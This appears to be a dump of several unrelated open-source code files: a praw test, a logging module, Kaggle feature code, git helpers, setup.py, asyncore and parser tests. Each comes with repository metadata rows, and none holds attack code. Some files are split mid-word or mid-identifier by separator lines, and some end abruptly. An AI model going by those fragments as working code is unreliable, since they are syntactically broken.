def __str__(self):
    """Human-readable dump: header line plus one line per recorded hop."""
    lines = ["%s(%sB):" % (self.NAME, len(self))]
    lines.append(" hops:%s" % len(self.hops))
    lines.extend(" ISD-AS: %s IFID: %s TS: %s" % hop for hop in self.hops)
    return "\n".join(lines)
|
michael-lazar/praw3
|
tests/test_handlers.py
|
Python
|
gpl-3.0
| 1,274
| 0
|
"""Tests for UnauthenticatedReddit class."""
from __future__ import print_function, unicode_literals

from random import choice

from mock import patch
from six.moves import cStringIO

from praw import handlers

from .helper import PRAWTest, betamax, replace_handler
class HandlerTest(PRAWTest):
    """Tests for the pluggable request handlers (rate limiting, caching)."""

    def setUp(self):
        super(HandlerTest, self).setUp()
        # In-memory sink available to handlers that persist cache state.
        self.cache_store = cStringIO()

    def _cache_hit_callback(self, key):
        """Stub target that test_cache_hit_callback patches via mock."""
        pass

    @replace_handler(handlers.RateLimitHandler())
    def test_ratelimit_handlers(self):
        # RateLimitHandler keeps no cache, so evicting any URL is a no-op (0).
        to_evict = self.r.config[choice(list(self.r.config.API_PATHS.keys()))]
        self.assertIs(0, self.r.handler.evict(to_evict))

    @betamax()
    def test_cache_hit_callback(self):
        with patch.object(HandlerTest, '_cache_hit_callback') as mock:
            self.r.handler.cache_hit_callback = self._cache_hit_callback
            # ensure there won't be a difference in the cache key
            self.r.login(self.un, self.un_pswd, disable_warning=True)
            before_cache = list(self.r.get_new(limit=5))
            after_cache = list(self.r.get_new(limit=5))
            self.assertTrue(mock.called)
            self.assertEqual(before_cache, after_cache)
            self.r.handler.cache_hit_callback = None
|
skyostil/tracy
|
src/common/Log.py
|
Python
|
mit
| 1,941
| 0.009789
|
# Copyright (c) 2011 Nokia
#
# Permission is hereby granted, free of charg
|
e, to any person obtaining a copy
# of this software and associated documentation files (the "So
|
ftware"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
import os
import Console
quiet = False
#logFile = open("tracy.log", "w")
logFile = None
labels = {
"warn": ((0xff, 0xff, 0x00), "(W)"),
"debug": ((0x00, 0x00, 0xff), "(D)"),
"notice": ((0x00, 0xff, 0x00), "(N)"),
"error": ((0xff, 0x00, 0x00), "(E)"),
}
def _log(label, msg, file = sys.stdout):
    """Write `msg` to `file` with the coloured marker for `label`, and
    mirror the line into the module-level `logFile` when one is set."""
    color, ident = labels[label]
    if not quiet:
        if file.isatty():
            # Clear the current line
            file.write("\r" + " " * 79 + "\r")
            Console.colorizer.setColor(*color)
        file.write(ident)
        if file.isatty():
            Console.colorizer.resetColor()
        file.write(" " + str(msg) + "\n")
    if logFile:
        # Bug fix: the old code wrote labels["warn"] + " " + str(msg), which
        # (a) always used the warning label regardless of `label`, and
        # (b) concatenated the whole (color, ident) tuple with a str,
        # raising TypeError. Use this call's text marker instead.
        print >>logFile, ident + " " + str(msg)
# Public logging entry points, one per severity label in `labels`.
warn = lambda msg: _log("warn", msg)
debug = lambda msg: _log("debug", msg)
notice = lambda msg: _log("notice", msg)
error = lambda msg: _log("error", msg)
|
Gzsiceberg/kaggle-avito
|
ins2/gen_data.py
|
Python
|
mit
| 19,154
| 0.005325
|
from csv import DictReader
from datetime import datetime, timedelta
from collections import defaultdict
import cPickle as pickle
from math import exp, log, sqrt
import random, gc
from util import read_dump, write_dump, cache, read_tsv, convert_ts, data, next_row, get_category
import argparse, ast, re, json
def filter_row(row, data_type, sr):
    """Keep only contextual-ad rows (ObjectType == 3); for training data
    (data_type == 0) additionally down-sample non-clicks at rate `sr`."""
    if int(row["ObjectType"]) != 3:
        return False
    clicked = int(row.get("IsClick", 0))
    is_train = data_type == 0
    if is_train and not clicked and random.random() > sr:
        return False
    return True
def calc_ctr(x, y):
    """Smoothed click-through rate as an integer percentage: ten virtual
    impressions at the global average CTR are mixed in as a prior."""
    avg_ctr = 0.0060281
    prior_clicks = avg_ctr * 10
    return int(round((x + prior_clicks) * 100.0 / (y + 10)))
def log_trans(x):
    """Compress a non-negative count into a small bucket via log(1 + x)."""
    bucketed = log(1 + x)
    return int(round(bucketed))
def get_user_info():
    """Load data/UserInfo.tsv into {UserID: {field: int_value}}."""
    info_by_uid = {}
    for _, record in read_tsv("data/UserInfo.tsv"):
        for field in record:
            record[field] = int(record[field])
        uid = record.pop("UserID")
        info_by_uid[uid] = record
    return info_by_uid
def trans_ad_info(ad_info):
    """Normalise one AdsInfo row in place for feature extraction.

    Returns None for non-contextual ads; otherwise drops identifier
    columns and converts Price/Params/Title/CategoryID to
    numeric/hashed/unicode forms.
    """
    # Only contextual ads are kept.
    if int(ad_info["IsContext"]) == 0:
        return None
    trans_keys = [
        "CategoryID",
        "Price",
        "Params",
        "Title",
    ]
    # Bookkeeping/identifier columns with no modelling value here.
    del_keys = ["AdID", "IsContext", "_id", "LocationID",]
    for k in del_keys:
        if k in ad_info:
            del ad_info[k]
    for key in trans_keys:
        val = ad_info[key]
        if key == "Price":
            if val == "":
                pass  # missing price stays as the empty-string sentinel
            else:
                ad_info[key] = float(ad_info[key])
        elif key == "Params":
            # Params is a stringified dict; hash each (key, value) pair.
            params = ad_info[key]
            params = ast.literal_eval(params) if params else {}
            for par_key in params:
                params[par_key] = unicode(params[par_key], "utf-8")
            val = tuple([hash_val(0, (k, v)) for k, v in params.items()])
            if len(val) == 0:
                val = (-1,)  # sentinel for "no params"
            ad_info[key] = val
        elif key == "Title":
            if not isinstance(ad_info[key], unicode):
                ad_info[key] = unicode(ad_info[key], "utf-8")
        else:
            if val == "":
                val = -1  # sentinel for a missing categorical value
            ad_info[key] = int(val)
    return ad_info
# Lazily-materialised cache of transformed ad rows.
# NOTE(review): assumes AdsInfo.tsv is sorted by AdID starting at 1, so
# ad_info_list[aid - 1] is the row for `aid` — confirm against the data.
ad_info_list = []
ad_info_iter = read_tsv("data/AdsInfo.tsv")

def get_ad_info(aid):
    # Advance the shared iterator until the requested AdID is cached.
    while aid - 1 >= len(ad_info_list):
        t, row = next(ad_info_iter, (None, None))
        if row is None:
            break
        ad_info_list.append(trans_ad_info(row))
    return ad_info_list[aid - 1]
# Streaming lookup over data/search_params.csv.
# NOTE(review): assumes the file is sorted by SearchID and that queries
# arrive in non-decreasing SearchID order — confirm against callers.
se_params_iter = read_tsv("data/search_params.csv", delimiter=",")
se_param_list = [None]  # one-element cache holding the last row read

def get_se_param(sid):
    # Advance until the cached row's SearchID reaches `sid`.
    # NOTE(review): if the iterator runs dry, `se_param` is None and the
    # next line raises — presumably every queried sid exists; verify.
    while se_param_list[0] is None or se_param_list[0]["SearchID"] < sid:
        t, se_param = next(se_params_iter, (None, None))
        se_param["SearchID"] = int(se_param["SearchID"])
        params = json.loads(se_param["SearchParams"])
        # Hash each (param_id, value) pair into a categorical id.
        se_param["SearchParams"] = [hash_val(0, (int(k), v)) for (k, v) in params.items()]
        se_param_list[0] = se_param
    # [-1] is the sentinel for "this search has no params row".
    params = [-1,] if se_param_list[0]["SearchID"] != sid else se_param_list[0]["SearchParams"]
    return params
# Streaming cache of ad prices, indexed by AdID - 1 (file ordered by AdID
# — NOTE(review): confirm, same assumption as get_ad_info above).
ad_price_list = []
ad_price_iter = read_tsv("data/ad_price.tsv", delimiter=" ")

def get_ad_price(aid):
    # Returns a float price, or "" when the price field was empty.
    while aid - 1 >= len(ad_price_list):
        t, row = next(ad_price_iter, (None, None))
        if row is None:
            break
        price = row["Price"]
        # Empty string is kept as the "unknown price" sentinel.
        price = float(price) if price else ""
        ad_price_list.append(price)
    return ad_price_list[aid - 1]
def get_features(sinfo, rows, test=False):
    """Assemble the per-search feature groups for one SearchID.

    `sinfo` is the SearchInfo row and `rows` the ad-stream rows shown for
    that search. Relies on the module-level streaming iterators being
    consumed in SearchID order.
    NOTE(review): `test` is unused here — confirm whether callers need it.
    """
    feature_map = defaultdict(list)
    sid = sinfo["SearchID"]
    sinfo["SearchParams"] = get_se_param(sid)

    # Skip ahead in the per-user counter stream to this search.
    user_cnt_row = next(user_cnt_iter, (None, None))[1]
    while int(user_cnt_row["SearchID"]) != sid:
        user_cnt_row = next(user_cnt_iter, (None, None))[1]

    user_aid_cnt_rows = next(user_aid_cnt_iter, (None, None))[1]
    while int(user_aid_cnt_rows[0]["SearchID"]) != sid:
        user_aid_cnt_rows = next(user_aid_cnt_iter, (None, None))[1]
    user_aid_cnt_dict = {}
    for row in user_aid_cnt_rows:
        aid = int(row["AdID"])
        user_aid_cnt_dict[aid] = row

    # Merge per-(user, ad) counters into each stream row and collect the
    # static ad metadata alongside.
    ad_infos = []
    for row in rows:
        aid = int(row["AdID"])
        row.update(user_aid_cnt_dict[aid])
        ad_infos.append(get_ad_info(aid))

    uid = int(sinfo["UserID"])
    # Fallback profile for users absent from UserInfo.tsv.
    user_info = user_info_map.get(uid, {"UserAgentID": "",
                                        "UserAgentOSID": "",
                                        "UserDeviceID": "",
                                        "UserAgentFamilyID": ""})
    feature_map["user_cnt"] = [user_cnt_row]
    feature_map["user_info"] = [user_info]
    feature_map["ad_info"] = ad_infos
    feature_map["stream_info"] = rows
    feature_map["sinfo"] = [sinfo]
    return feature_map
def extract_slot_feas(rows, sinfo):
    """Derive slot/layout features for one result page, in place.

    Mutates the stream `rows` (highlight-neighbour counts, price rank and
    ratio) and `sinfo` (per-ObjectType counts, layout signature hashes).
    """
    # Order slots by on-page position. (Py2: map() returns a list.)
    data = map(lambda x: (int(x["Position"]), int(x["ObjectType"]), x), rows)
    data.sort()
    price_data = []
    ot_cnt = defaultdict(int)
    all_pos = []
    all_ot = []
    for i in range(len(data)):
        all_pos.append(data[i][0])
        all_ot.append(data[i][1])
        aid = int(data[i][2]["AdID"])
        price_data.append((get_ad_price(aid), i))
        i_obt = data[i][1]
        ot_cnt[i_obt] += 1
        # Count highlighted slots (ObjectType == 2) above/below this slot.
        ucnt, lcnt = 0, 0
        for j in range(len(data)):
            if i == j:
                continue
            j_obt = data[j][1]
            if j_obt == 2:
                if i < j:
                    lcnt += 1
                else:
                    ucnt += 1
        data[i][2]["hl_lcnt"] = lcnt
        data[i][2]["hl_ucnt"] = ucnt
    for k in range(1, 4):
        v = ot_cnt[k]
        sinfo["ot%s_cnt"%k] = v
    sinfo["record_cnt"] = len(rows)
    # Hash the position / ObjectType layouts into compact categorical ids.
    sinfo["pos_type"] = hash_val(0, tuple(all_pos))
    sinfo["pos_ot_type"] = hash_val(0, tuple(all_ot))
    price_data.sort()
    avg_price, avg_cnt = 0, 0
    for p, i in price_data:
        if p != "":
            avg_price += p
            avg_cnt += 1
            data[i][2]["price_pos"] = i  # rank among priced slots
        else:
            data[i][2]["price_pos"] = -1  # no price available
    if avg_cnt == 0 or avg_price <= 0:
        pass  # no usable prices on this page; price_ratio is not set
    else:
        avg_price /= avg_cnt
        for p, i in price_data:
            if not p:
                ratio = -1  # missing price
            elif avg_price <= 0:
                ratio = -2  # defensive; unreachable given the guard above
            else:
                ratio = int(round((p / avg_price) * 100))
            data[i][2]["price_ratio"] = ratio
def stream_info_func(vs, name=False):
    """Yield per-row stream feature dicts; with name=True yield the
    column-name list instead. `vs` is a one-element container whose
    first item is the iterable of rows."""
    keys = ["AdID",
            "Position",
            "HistCTR",
            "hl_lcnt",
            "hl_ucnt",
            "clk_cnt",
            "show_cnt",
            "t_show_cnt",
            "price_pos",
            "price_ratio",
            ]
    for v in vs[0]:
        if name:
            yield keys
        else:
            x = {}
            for k in keys:
                if k == "HistCTR":
                    val = v[k]
                    if val != "":
                        # Scale the float CTR into an integer (per-mille).
                        val = int(round(float(val) * 1000))
                elif k in ("pos_show_cnt",):
                    # NOTE(review): "pos_show_cnt" is not in `keys`, so this
                    # branch never fires — looks like a leftover; confirm.
                    val = log_trans(int(v[k]))
                else:
                    val = v[k]
                x[k] = val
            # Smoothed per-(user, ad) click-through rate.
            x["u_aid_ctr"] = calc_ctr(int(x["clk_cnt"]), int(x["show_cnt"]))
            # x["u_pos_ctr"] = calc_ctr(int(x["pos_clk_cnt"]), int(x["pos_show_cnt"]))
            yield x
def sinfo_func(vs, name=False):
keys = [
"IPID",
"UserID",
"IsUserLoggedOn",
"SearchQuery",
"SearchParams",
"ot1_cnt",
"ot2_cnt",
"ot3_cnt",
"record_cnt",
"pos_type",
"pos_ot_type",
"s_LocationID",
"s_CategoryID",
]
for v in vs[0]:
if name:
yield keys
else:
x = {}
for k in keys:
if k == "SearchQuery":
query = unicode(v["SearchQuery"], "utf-8")
val = map(lambda x : hash_val(0, x), query.split())
if len(val) == 0:
val = [-1,]
else:
val = v[k]
x[k] = val
#
|
natano/tiget
|
tiget/git.py
|
Python
|
isc
| 872
| 0.001147
|
import pkg_resources
from tiget.conf import settings
class GitError(Exception): pass
def get_config(name):
    """Look up `name` in the configured repository's git config.

    Raises GitError when no repository is configured.
    """
    repo = settings.core.repository
    if repo is None:
        raise GitError('no repository found')
    return repo.config[name]
def is_repo_initialized():
    """Whether a repository is configured and its tiget branch exists."""
    repo = settings.core.repository
    if repo is None:
        return False
    branch_ref = 'refs/heads/{}'.format(settings.core.branch)
    try:
        repo.lookup_reference(branch_ref)
    except KeyError:
        return False
    else:
        return True
def init_repo():
    """Create the initial tiget commit (bundled default tigetrc).

    Raises GitError if the tiget branch already exists.
    """
    from git_orm import transaction
    if is_repo_initialized():
        raise GitError('repository is already initialized')
    with transaction.wrap() as trans:
        tigetrc = pkg_resources.resource_string('tiget', 'data/tigetrc')
        trans.set_blob(['config', 'tigetrc'], tigetrc)
        trans.add_message('Initialize Repository')
|
mkrcah/propsort
|
propsort/__init__.py
|
Python
|
mit
| 22
| 0
|
# Reconstructed from a garbled span: a single author assignment.
__author__ = 'mkrcah'
|
kenshinx/rps
|
script/proxycheck/asyncore.py
|
Python
|
mit
| 20,290
| 0.001774
|
# -*- Mode: Python -*-
# Id: asyncore.py,v 2.51 2000/09/07 22:29:26 rushing Exp
# Author: Sam Rushing <rushing@nightmare.com>
# ======================================================================
# Copyright 1996 by Sam Rushing
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provide
|
d that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Sam
# Rushing not be u
|
sed in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================
"""Basic infrastructure for asynchronous socket service clients and servers.
There are only two ways to have a program on a single processor do "more
than one thing at a time". Multi-threaded programming is the simplest and
most popular way to do it, but there is another very different technique,
that lets you have nearly all the advantages of multi-threading, without
actually using multiple threads. it's really only practical if your program
is largely I/O bound. If your program is CPU bound, then pre-emptive
scheduled threads are probably what you really need. Network servers are
rarely CPU-bound, however.
If your operating system supports the select() system call in its I/O
library (and nearly all do), then you can use it to juggle multiple
communication channels at once; doing other work while your I/O is taking
place in the "background." Although this strategy can seem strange and
complex, especially at first, it is in many ways easier to understand and
control than multi-threaded programming. The module documented here solves
many of the difficult problems for you, making the task of building
sophisticated high-performance network servers and clients a snap.
"""
import select
import socket
import sys
import time
import os
from errno import EALREADY, EINPROGRESS, EWOULDBLOCK, ECONNRESET, \
ENOTCONN, ESHUTDOWN, EINTR, EISCONN, EBADF, ECONNABORTED, errorcode
try:
socket_map
except NameError:
socket_map = {}
def _strerror(err):
    """Best-effort textual description of an errno value."""
    try:
        return os.strerror(err)
    except (ValueError, OverflowError, NameError):
        pass
    # os.strerror could not handle it; fall back to the symbolic name.
    if err in errorcode:
        return errorcode[err]
    return "Unknown error %s" %err
class ExitNow(Exception):
    """Raised by handlers to abort the loop; never swallowed below."""
    pass

# Exceptions the generic dispatch helpers must always re-raise.
_reraised_exceptions = (ExitNow, KeyboardInterrupt, SystemExit)
def _safe_dispatch(obj, event):
    # Shared error-routing shim for the three event dispatchers below:
    # loop-control exceptions propagate, anything else goes to the
    # channel's own handle_error().
    try:
        event()
    except _reraised_exceptions:
        raise
    except:
        obj.handle_error()

def read(obj):
    """Deliver a readable event to `obj`."""
    _safe_dispatch(obj, obj.handle_read_event)

def write(obj):
    """Deliver a writable event to `obj`."""
    _safe_dispatch(obj, obj.handle_write_event)

def _exception(obj):
    """Deliver an exceptional-condition event to `obj`."""
    _safe_dispatch(obj, obj.handle_expt_event)
def readwrite(obj, flags):
    """Dispatch poll()-style event `flags` to the matching obj handlers."""
    try:
        if flags & select.POLLIN:
            obj.handle_read_event()
        if flags & select.POLLOUT:
            obj.handle_write_event()
        if flags & select.POLLPRI:
            obj.handle_expt_event()
        if flags & (select.POLLHUP | select.POLLERR | select.POLLNVAL):
            obj.handle_close()
    except socket.error, e:
        # Ordinary disconnect errors close the channel; anything else is
        # treated as a real error.
        if e.args[0] not in (EBADF, ECONNRESET, ENOTCONN, ESHUTDOWN,
                             ECONNABORTED):
            obj.handle_error()
        else:
            obj.handle_close()
    except _reraised_exceptions:
        raise
    except:
        obj.handle_error()
def poll(timeout=0.0, map=None):
    """One select() pass over `map` (default: the global socket_map).

    Extended relative to stdlib asyncore: channels whose timeout() is
    true get handle_timeout() dispatched after the fd events.
    """
    if map is None:
        map = socket_map
    if map:
        r = []; w = []; e = []; t = []
        for fd, obj in map.items():
            is_r = obj.readable()
            is_w = obj.writable()
            is_t = obj.timeout()
            if is_r:
                r.append(fd)
            if is_w:
                w.append(fd)
            if is_r or is_w:
                e.append(fd)
            if is_t:
                t.append(fd)
        if [] == r == w == e:
            # Nothing to select on: just wait out the timeout.
            # NOTE(review): this early return also skips the
            # handle_timeout() dispatch below even when `t` is non-empty —
            # confirm that is intended.
            time.sleep(timeout)
            return
        try:
            r, w, e = select.select(r, w, e, timeout)
        except select.error, err:
            # EINTR just means "interrupted, try again next loop pass".
            if err.args[0] != EINTR:
                raise
            else:
                return
        for fd in r:
            obj = map.get(fd)
            if obj is None:
                continue
            read(obj)
        for fd in w:
            obj = map.get(fd)
            if obj is None:
                continue
            write(obj)
        for fd in e:
            obj = map.get(fd)
            if obj is None:
                continue
            _exception(obj)
        for fd in t:
            obj = map.get(fd)
            if obj is None:
                continue
            obj.handle_timeout()
def poll2(timeout=0.0, map=None):
    """One select.poll() pass over `map`.

    Unlike the poll() above, this variant does not dispatch the
    timeout()/handle_timeout() extension.
    """
    # Use the poll() support added to the select module in Python 2.0
    if map is None:
        map = socket_map
    if timeout is not None:
        # timeout is in milliseconds
        timeout = int(timeout*1000)
    pollster = select.poll()
    if map:
        for fd, obj in map.items():
            flags = 0
            if obj.readable():
                flags |= select.POLLIN | select.POLLPRI
            if obj.writable():
                flags |= select.POLLOUT
            if flags:
                # Only check for exceptions if object was either readable
                # or writable.
                flags |= select.POLLERR | select.POLLHUP | select.POLLNVAL
                pollster.register(fd, flags)
        try:
            r = pollster.poll(timeout)
        except select.error, err:
            if err.args[0] != EINTR:
                raise
            r = []
        for fd, flags in r:
            obj = map.get(fd)
            if obj is None:
                continue
            readwrite(obj, flags)

poll3 = poll2  # Alias for backward compatibility
def loop(timeout=30.0, use_poll=False, map=None, count=None):
    """Run the event loop over `map` (default: the global socket_map).

    `count` bounds the number of poll passes; None means run until the
    map is empty. `use_poll` is accepted for API compatibility but has
    no effect (see note below).
    """
    if map is None:
        map = socket_map
    # NOTE(review): the original selected `poll` in *both* branches of the
    # `use_poll` conditional — only this module's poll() implements the
    # timeout()/handle_timeout() extension, so poll2 is (apparently
    # deliberately) never used. The dead conditional is collapsed here
    # without changing behavior.
    poll_fun = poll
    if count is None:
        while map:
            poll_fun(timeout, map)
    else:
        while map and count > 0:
            poll_fun(timeout, map)
            count = count - 1
class dispatcher:
debug = False
connected = False
accepting = False
closing = False
addr = None
ignore_log_types = frozenset(['warning'])
def __init__(self, sock=None, map=None):
if map is None:
self._map = socket_map
else:
self._map = map
self._fileno = None
if sock:
# Set to nonblocking just to make sure for cases where we
# get a socket from a blocking source.
sock.setblocking(0)
self.set_socket(sock, map)
self.connected = True
# The constructor no longer requires that the socket
# passed be connected.
try:
self.addr = sock.getpeername()
except socket.error, err:
if err.args[0] == ENOTCONN:
# To handle the case where we got an unconnected
# socket.
self.connected = False
else:
# The socket is broken in some unknown way, alert
# the user and remove it from the map (to prevent
# polling of broken sockets).
self.del_channel(map)
|
django-json-api/rest_framework_ember
|
tests/test_parsers.py
|
Python
|
bsd-2-clause
| 4,172
| 0.001198
|
import json
from io import BytesIO
import pytest
from rest_framework.exceptions import ParseError
from rest_framework_json_api.parsers import JSONParser
from rest_framework_json_api.utils import format_value
from tests.views import BasicModelViewSet
class TestJSONParser:
@pytest.fixture
def parser(self):
    """A fresh JSON:API parser instance."""
    return JSONParser()

@pytest.fixture
def parse(self, parser):
    """Callable that feeds a dict through the parser as a UTF-8 stream."""
    def parse_wrapper(data, parser_context):
        stream = BytesIO(json.dumps(data).encode("utf-8"))
        return parser.parse(stream, None, parser_context)

    return parse_wrapper

@pytest.fixture
def parser_context(self, rf):
    """Minimal DRF parser context: a POST request and a plain viewset."""
    return {"request": rf.post("/"), "kwargs": {}, "view": BasicModelViewSet()}
@pytest.mark.parametrize(
    "format_field_names",
    [
        False,
        "dasherize",
        "camelize",
        "capitalize",
        "underscore",
    ],
)
def test_parse_formats_field_names(
    self,
    settings,
    format_field_names,
    parse,
    parser_context,
):
    """Attribute and relationship names come back as snake_case
    regardless of the configured wire format."""
    settings.JSON_API_FORMAT_FIELD_NAMES = format_field_names
    # Build the incoming document with names in the wire format under test.
    data = {
        "data": {
            "id": "123",
            "type": "BasicModel",
            "attributes": {
                format_value("test_attribute", format_field_names): "test-value"
            },
            "relationships": {
                format_value("test_relationship", format_field_names): {
                    "data": {"type": "TestRelationship", "id": "123"}
                }
            },
        }
    }

    result = parse(data, parser_context)

    assert result == {
        "id": "123",
        "type": "BasicModel",
        "test_attribute": "test-value",
        "test_relationship": {"id": "123", "type": "TestRelationship"},
    }
def test_parse_extracts_meta(self, parse, parser_context):
data = {
"data": {
"type": "BasicModel",
},
"meta": {"random_key": "random_value"},
}
result = parse(data, parser_context)
assert result["_meta"] == data["meta"]
def test_parse_with_default_arguments(self, parse):
data = {
"data": {
"type": "BasicModel",
},
}
result = parse(data, None)
assert result == {"type": "BasicModel"}
def test_parse_preserves_json_value_field_names(
self, settings, parse, parser_context
):
settings.JSON_API_FORMAT_FIELD_NAMES = "dasherize"
data = {
"data": {
"type": "BasicModel",
"attributes": {"json-value": {"JsonKey": "JsonValue"}},
},
}
result = parse(data, parser_context)
assert result["json_value"] == {"JsonKey": "JsonValue"}
def test_parse_raises_error_on_empty_data(self, parse, parser_context):
data = []
with pytest.raises(ParseError) as excinfo:
parse(data, parser_context)
assert "Received document does not contain primary data" == str(excinfo.value)
def test_parse_fails_on_list_of_objects(self, parse, parser_context):
data = {
"data": [
{
"type": "BasicModel",
"attributes": {"json-value": {"JsonKey": "JsonValue"}},
}
],
}
with pytest.raises(ParseError) as excinfo:
parse(data, parser_context)
assert (
"Received data is not a valid JSON:API Resource Identifier Object"
== str(excinfo.value)
)
def test_parse_fails_when_id_is_missing_on_patch(self, rf, parse, parser_
|
context):
parser_context["request"] = rf.patch("/
|
")
data = {
"data": {
"type": "BasicModel",
},
}
with pytest.raises(ParseError) as excinfo:
parse(data, parser_context)
assert "The resource identifier object must contain an 'id' member" == str(
excinfo.value
)
|
Kingside/six-four
|
setup.py
|
Python
|
mit
| 2,189
| 0.01736
|
#!/usr/bin/env python
"""Packaging script for Six-Four, a base64 image encoder/embedder.

(Reconstructed: extraction artifacts split the long_description and one
classifier string.)
"""

from setuptools import setup

setup(name='sixfour',
      version='1.3.3',
      description='base64 Image Encoder and Embedder',
      author='Christopher Simpkins',
      author_email='chris@zerolabs.net',
      maintainer='Christopher Simpkins',
      maintainer_email='chris@zerolabs.net',
      url='https://github.com/chrissimpkins/six-four',
      platforms=['any'],
      py_modules=['sixfour'],
      scripts=['sixfour'],
      license='MIT License',
      keywords='image,base64,web,internet,CSS,HTML,Markdown,sass,scss,less,embed,tag,64',
      # reStructuredText shown on the PyPI project page.
      long_description="""Six-Four is a base64 encoder for images that embeds an appropriately formatted, encoded image in HTML, Markdown, CSS, LESS, or SASS files, or streams the raw image data through the standard output stream.
`Six-Four Documentation <http://chrissimpkins.github.io/six-four/>`_
Tested in Python v2.7.6 & v3.3.2""",
      classifiers=[
          'Development Status :: 5 - Production/Stable',
          'Environment :: MacOS X',
          'Environment :: Other Environment',
          'Environment :: Web Environment',
          'Intended Audience :: Developers',
          'Intended Audience :: End Users/Desktop',
          'Intended Audience :: Information Technology',
          'Intended Audience :: Science/Research',
          'License :: OSI Approved :: MIT License',
          'Natural Language :: English',
          'Operating System :: MacOS',
          'Operating System :: Microsoft',
          'Operating System :: Microsoft :: MS-DOS',
          'Operating System :: Microsoft :: Windows',
          'Operating System :: Other OS',
          'Operating System :: POSIX',
          'Operating System :: POSIX :: BSD',
          'Operating System :: POSIX :: BSD :: BSD/OS',
          'Operating System :: POSIX :: BSD :: FreeBSD',
          'Operating System :: POSIX :: Linux',
          'Operating System :: POSIX :: Other',
          'Operating System :: Unix',
          'Programming Language :: Python',
          'Programming Language :: Python :: 2',
          'Programming Language :: Python :: 3',
          'Programming Language :: Unix Shell',
          'Topic :: Internet',
          'Topic :: Multimedia',
          'Topic :: Multimedia :: Graphics',
          'Topic :: Multimedia :: Graphics :: Editors',
          'Topic :: Multimedia :: Graphics :: Graphics Conversion'
      ],
      )
|
chipx86/reviewboard
|
reviewboard/hostingsvcs/evolutions/account_hosting_url.py
|
Python
|
mit
| 247
| 0
|
from __future__ import unicode_literals
from django_evolution.mutations import AddField
from django.db import models
# Evolution: add HostingServiceAccount.hosting_url (nullable, max 256
# chars).  (Reconstructed around extraction artifacts that split the
# AddField call.)
MUTATIONS = [
    AddField('HostingServiceAccount', 'hosting_url', models.CharField,
             max_length=256, null=True)
]
|
arrow-/pitstops
|
commit.py
|
Python
|
unlicense
| 862
| 0.00232
|
import os
import pickle
import sys
# This function only READS the Commit info.
# There is no point in loading any commit in memory.
# What purpose can that serve? Nothing. (Prove this)
def load(cls, name, path):
    """Read pickled commit info from *path* and return it.

    Exits the process with status 1 if the file does not exist.
    (*cls* and *name* are accepted for interface compatibility; the
    visible code never uses them.)
    """
    try:
        with open(path, 'rb') as commit_info_file:
            # pickle.load() takes the open file object itself.  The old
            # code called pickle.load(commit_info_file.read()), which is
            # a TypeError (and `pickle` was never imported).
            return pickle.load(commit_info_file)
    except FileNotFoundError:
        print("Could not find commit-info here:\n`%s`" % path)
        sys.exit(1)
# This object hold only some info about a SINGLE Commit
class Commit:
    """Holds information about a SINGLE commit.

    The original constructor silently discarded *parent*, *branch* and
    *repo*; they are now stored as attributes (a backward-compatible
    addition).
    """

    def __init__(self, parent, branch, message, repo):
        self.parent = parent
        self.branch = branch
        self.repo = repo
        self.message = message
        self.hash = self.make_hash()
        # self.repo.dstore.get_commits_by_branch(branch)
        # make changes to tree
        # save
        # make chages to main tree?
        # exit

    def make_hash(self):
        # Placeholder implementation; a real content hash is TODO.
        return "yash uuid"
|
xulesc/algos
|
psc/test_usm_bp.py
|
Python
|
gpl-3.0
| 1,016
| 0.030512
|
#!/usr/bin/python
import Bio.PDB.PDBParser
from Bio.PDB.PSC.usm import USM
import os
import numpy as np
def get_ca_atom_list(model):
    """Collect the C-alpha atom of every residue in *model*.

    Residues without a 'CA' entry are silently skipped.
    """
    ca_atoms = []
    residues = (res for chain in model for res in chain)
    for residue in residues:
        try:
            ca_atoms.append(residue['CA'])
        except:  # no CA atom in this residue -- skip it
            pass
    return ca_atoms
def get_contact_map_complexities(in_dir):
usm = USM()
pdb_parser = Bio.PDB.PDBParser(QUIET = True)
structure_cm_string = {};
for filename in os.listdir(in_dir):
structure = pdb_parser.get_structure("reference", "%s/%s" %(in_dir, filename))
coords = np.array(m
|
ap(lambda x : x.coord, get_ca_atom_list(structure[0])))
structure_cm_string[filename] = usm.get_contact_map(coords)[1]
for k1, v1 in structure_cm_string.iteritems():
for k2, v2 in structure_cm_string.iteritems():
dist = usm.dist(structure_cm_string[k1], structure_cm_string[k2])
print '%s - %s : %f' %(
|
k1, k2, dist)
if __name__ == '__main__':
    # threshold='nan' is the legacy numpy spelling of "never summarize
    # arrays when printing".  NOTE(review): modern numpy rejects the
    # string form -- confirm the pinned numpy version.
    np.set_printoptions(threshold='nan')
    get_contact_map_complexities('pdb_data')
|
wapiflapi/gxf
|
gxf/extensions/registers.py
